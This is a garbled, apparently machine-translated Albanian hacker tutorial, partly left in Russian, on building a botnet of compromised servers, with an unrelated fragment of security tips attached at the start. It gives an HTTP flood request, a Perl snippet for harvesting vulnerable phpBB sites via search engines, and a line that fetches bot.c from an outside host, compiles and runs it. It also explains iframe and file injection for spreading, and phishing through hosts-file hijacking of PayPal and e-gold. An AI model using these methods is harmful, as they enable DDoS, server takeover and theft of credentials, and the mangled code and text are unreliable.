3. Programi i Encryption Special do të mbrojë të dhënat tuaja personale, edhe nëse bot hyri në kompjuter, sepse për të hyrë në to do të duhet të kollisin fjalëkalimin.

4. Ndjenjën dhe kujdesin e përbashkët. Nëse doni të mbroni të dhënat tuaja nga një lloj kërcënimesh të ndryshme, nuk duhet të shkarkoni dhe instaloni programe me origjinë të panjohur, arkivat e hapura me skedarë në kundërshtim me paralajmërimet antivirus, shkoni në faqet që shenjat e shfletuesit si të rrezikshme etj.

Ne falënderojmë Kaspersky Lab për ndihmë në përgatitjen e materialit

Sistemet e mbrojtjes vazhdimisht po përmirësohen, programuesit bëhen më me përvojë. Tani lejohet gabime më pak dhe më pak të njohura.

[prologue]
Interneti është grimcuar me një forcë të madhe. Khakura bëhet më e vështirë për të kërkuar dobësitë. Administratorët përdoren për të mbrojtur zhvillimin e ekspmertit më të mirë të sigurisë. A i njihni mendimet tuaja? Në fakt, ka shumë dobësi në internet, ky është një kuptim i vogël prej tyre. Epo, është ende si të shihet këtu, imagjinoni situatën, keni marrë një lloj bastardi të rrjetit, ju doni ta ndëshkoni atë. Sot do të flasim për krijimin e botnetit tonë luftarak.
Pra, çfarë është "bot". Personi i paarritshëm menjëherë në kujtesë nxiton kundërshtarët e trashë në lojërat kompjuterike që ju xhironi në dy minuta. Po, është pjesërisht. Në rastin tonë, "bot" është një program që ekzekuton ekipet e ngulitura në të. Vrodi nuk është asgjë e veçantë. Dikush do të kundërshtojë: "Unë, thonë ata, në pesë vjet kam shkruar këtë, ju klikoni mbi butonin dhe programin, Olya-la, mbyllet" për të harruar fëmijërinë. Ne të gjithë e dimë se aftësitë e kodimit janë të pafundme, dhe është e mundur të përdoret për të mirë dhe të keqen. Sigurisht, ne gjithmonë e përdorim zhvillimin tonë me intime të mira. "Botnet" është shumë bots e mbledhur në një qendër, të cilat në mënyrë sinkroniste ekzekutojnë komandat e pronarit. Bots, nga rruga, kryesisht kanë për qëllim më shumë në makinat e Windows. Këtu ju dhe fjalëkalimet mund të mbështeten, dhe Sox për të vënë, dhe formatin e vidhos, unë do të largohem nga rregullat dhe të tregoj se si të krijoj një botnet të makinave nix. Funksioni kryesor i bot tonë është kufizimi i sulmeve të DDO-ve. Kjo është mënyra e përsosur për të përdorur kanale të gjera të serverëve NIX. Numëroni. Serveri që dëshironi të "plotësoni" qëndron në një kanal 100MB. IE, 10-20 bots që qëndrojnë në të njëjtin kanal do të rrokulliset serverin për një moment. Nëse një nga një server mund të mbulohet me një firewall, atëherë nga më shumë bots, mjerisht, pa shpëtim

[Ne shkruaj bot]
Listimi i botimit shembullor ju do të gjeni në një lidhje në fund të artikullit. Ne do të kuptojmë pak me kodin. (Uh, ëndrra përsëri gjithçka është e kontrolluar nëpërmjet IRC-së përmes Web!). Nga rruga, kontrolli nëpërmjet IRC u zgjodh përmes interaktivitetit të saj. Supozoni se unë dua të redaktoj shfrytëzon bërthamor lokal disa serverë në një botnet. Unë vetëm të zbatojë sh fantame -A mjetet e ekipit dhe në çast gjeni kompjuterin që kam nevojë. Pastaj ai gjithashtu kryen komandën në klientin IRC, ngarkon Bacdorin dhe të marrë guaskë interaktive për veprim të mëtejshëm. Karakteristikat janë të pakufizuara. Ju do të thoni - ju mund të zbatoni një kontroll të tillë përmes internetit, por pse ristartoni faqen dhe kaloni trafikun? Gorryozda Është më e përshtatshme për të vëzhguar gjithçka në kohë reale (edhe pse, me më shumë 1000 botne, ajo do të kujdeset për lehtësinë e ndërfaqes. Setrow Sound Sensitated). Shumë njerëz mendojnë se kufizimi i DDO-ve është shumë kompleks. Këtu është një shembull i kodit të sulmit të zakonshëm:

Get /Srver.org http / 1.0 \\ r \\ nconnection: Keep-Alive \\ r \\ nuser-agjent: Mozilla / 4.75 (x11; u; Windows 5.2 i686) \\ r \\ nhost: server.org:80 undalnaccept: Image / GIF, imazh / xx-xbitmap, imazh / jpeg, imazh / pjpeg, imazh / png, * / * \\ r \\ naccept-encoding: Gzip \\ r \\ naccept-charset: është 8859 -1, *, UTF-8 \\ r \\ n \\ r \\ n

Dmth, ne vetëm dërgojmë kërkesën në server duke e detyruar atë për t'iu përgjigjur asaj. Për më tepër, dërgoni atë derisa serveri nuk bie nga mungesa e kohës ose kohës së procesorit. Por jeni të kufizuar vetëm në bots Nix, ju duhet të krijoni dy botnets Windows, për shembull, bazuar në Agobot. Për ta bërë këtë, ju mund të krijoni një kod të caktuar për bot që do të skanojë në lëndën e dobësive LSASL / DCOM të makinës që lidhet me serverin në të cilin është instaluar bot.

[Krijo një botnet]
Në të vërtetë krijojnë botnet është shumë e lehtë. Për ta bërë këtë, ne do të duhet të gjejmë një cenueshmëri në çdo skenar të internetit. Vulnerabiliteti i gjetur duhet të lejojë që komandat e predhën interpretuese të ekzekutohen. Kur të gjeni një cenueshmëri, i kushtoni vëmendje emrit të skedarit të qeseve, titullit të saj, emrit të sistemit të prekshëm. Tani, me ndihmën e këtyre të dhënave, ju duhet të bëni një pyetje të mirë kërkimi. Për shembull, futja e cenueshmërisë së mirënjohur në PHPBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ Sock \u003d io :: socket :: inet-\u003e i ri (peeraddr \u003d\u003e "kërko.aol.com", peerport \u003d\u003e "80", p ro to \u003d\u003e "TCP") ose tjetër; PRINT $ SOCK "GET / OOOLCOM / Kërko? Q \u003d ViewTOPIC.PHP% 3ft% 3D7 & Faza \u003d 0 & Page \u003d $ n http / 1.0 \\ n \\ n"; @Resu \u003d.<$sock>; Mbylle ($ çorapë);

Do të jetë http://server.org/bot.c ;gcc bot.c -o bash; chmod + x bash; ./ bash;

Këtu ju mund të shihni dy probleme në të njëjtën kohë. Ngarkesa dhe GCC nuk mund të jenë ose përdorimi i tyre do të ndalohet. Këtu, karrige lëkundëse Fech, Curl dhe Get ose Console Browser Lynx do të ndihmojë, ose të përdorë protokollin FTP. Realizimi i tij është më i komplikuar, por edhe plus se FTP është se ka kudo në lidhje me përpiluesin, ju thjesht mund të përpiloni binarin në shell dhe shpresoj se gjithçka do të jetë në rregull me pajtueshmërinë, ose të rishkruaj bot në gjuhët e interpretuara - Perl ose php. Çdo metodë ka avantazhet dhe disavantazhet e tij, çfarë duhet të përdorni zgjedhjen tuaj. I përdorur për të përdorur serverin e kapur në maksimum. Në fund të fundit, bot në server nix do të zgjasë vetëm deri në ristartimin e parë të makinës. Nga kjo situatë ka një prodhim interesant. Bot do të kërkojë për skedarë të interpretuar (.pl, .php) në dispozicion në hyrje dhe shtoni kodin e shkarkimit tek ata dhe filloni bot. Ose mund të krijoni një tjetër botnet të erës. Gjithashtu zbatohet lehtësisht. Këtu ju duhet një dobësi në Internet Explorer, Opera, Mozilla, e cila çon në kërcim dhe të drejtuar skedarin e dëshiruar. Tjetra është krijuar Inframe Regjistrimi Shkarkimi i kodit tonë me qëllim të keq. Kjo hyrje shtohet në të gjitha dosjet e indeksit (ose në të gjitha ku ka një kod HTML, gjithçka varet nga arroganca juaj). Me një punë të tillë, një skenar i vogël është duke u përballur në mënyrë të përkryer me hazin, të cilin gjithashtu do të gjeni në arkiv. Buglessness është e mbushur me shënime të dobësive kritike në Internet Explorer, kështu që në vartësin tonë do të jetë Bothenet në sistemet e Windows (avantazhet e tij të përmendura më lart). Çdo gjë, nisni krimbin tonë të kërkimit në skllavin me shpejtësi të lartë, pini kafe (birrë, vodka, lëng domate) të vijë në kanalin IRC treguar në pronat e bot dhe të vëzhgojnë numrin e vartësve tuaj. Në përfundim, unë dua të përcjellë hello për të gjithë ata që më njohin dhe ju uroj fat të mirë. Mos eja.
Xxxxhhhhhhhhhhhhhhhhhhhhhh xxx

Vulnerabiliteti në PHPBB është i rëndësishëm deri në 2.0.16, megjithëse zhvilluesit pohojnë se ato janë korrigjuar në 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org.

Phishing
Është shumë i përshtatshëm për të përdorur bots si një organizatë e phishing. Për ta bërë këtë, ne kemi nevojë për faqe të veçanta të mprehura nën faqen e phishing emulimin e faqes që ne kemi nevojë dhe hosting të mirë, server dedikuar ose VDS. Faqet e tilla mund të bëhen vetë, për të blerë, për të gjetur në internet. Zgjedhja është e madhe. Më shpesh phishing është organizuar në faqet: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om dhe të tjerët, gjithsesi, lidhur me tregtinë elektronike. Tjetra, Windows Bot rishkruaj \\ sistemit32 \\ shoferët \\ hosts file duke shtuar adresën IP të serverit tuaj dhe caktimin e faqes që ju nevojitet për të. Formati i skedarit është si vijon:

102.54.94.97 e-gold.com 102.54.94.97 Paypal.com

IE, rezultatet në faqet e shfletuesit e-gold.com dhe paypal.com përdoruesi merr në serverin tonë nuk është asgjë e dyshimtë. Nga ana tjetër, të dhënat për fushat përkatëse shtohen në serverin e peshkuesit në httpd.conf.

Dokumentroot "/home/e-gold.com/www" servername "www.e-gold.com" serveralias "e-gold.com" "www.e-gold.com"

Do të kuptohet në vijën e shfletuesit do të jetë e gjitha adresa e njohur e-gold.com dhe madje edhe një përdorues i avancuar i regjistruar në vendin asgjë për të pezulluar. Për plotësinë e figurës, unë do të them se nëse përdoruesi përdor një server proxy, atëherë në këtë mënyrë nuk do të funksionojë

Bots për çdo shije
AGOBOT / PHATBOT / Forbot / Xtrembot
Kjo është familja më e mirë e shisheve. Shkruar në C ++. Ka shumë funksione të mbrojtjes së zbulimit dhe kanë më shumë se 500 modifikime për shkak të një strukture modulare të theksuar qartë.
SDBOT / RBOT / URBOT / URXBOT
Shumë popullor në datën e bots për sulmet e DDOS. Kanë shumë karakteristika të tjera. Të tilla si hapja e Sock4, keylogger, skaner automatik LSASS dhe dobësitë e DCOM. Gjithashtu ka një funksion të ridrejtimit të kërkesave në faqet e kompanive anti-virus në një server lokal duke redaktuar \\ sistemet32 \\ shoferët \\ hosts dhe instalimin e një server të vogël të rreme web në 80 port.
Dsnx bots.
Ky bot mund të kryejë sulmet e DDOS, portat e skanimit dhe disa gjëra më të vogla.
Q8 bots.
Bot i shkëlqyer nën sistemin NIX. Ajo ka kodin e tij kompakt (27 KB, përbëhet nga një skedar) dhe jo funksionalitet i keq. Mund të përditësohet në mënyrë dinamike duke shkarkuar dhe drejtuar një skedar të ri. Zbaton mirë zbatimin bazë të DDOS (syn-përmbytje, UDP-përmbytje). Të aftë për të kryer ekipet e sistemit. Gjithashtu mjaft i maskuar në sistem.
kaiten.
Gjithashtu një bot i mirë nën sistemin Unix / Linux. Në gjendje për të hapur një predhë të largët në serverin e sekuencës.
Bots bazuar në Perl
Këto janë bots shumë të vogla të shkruara në Perl. Përdoret për sulmet e DDOS në sistemet e bazuara në Union.

---
Artikulli ka një paragjykim të madh ndaj piraterisë, kështu që është e pakuptueshme - pyesni.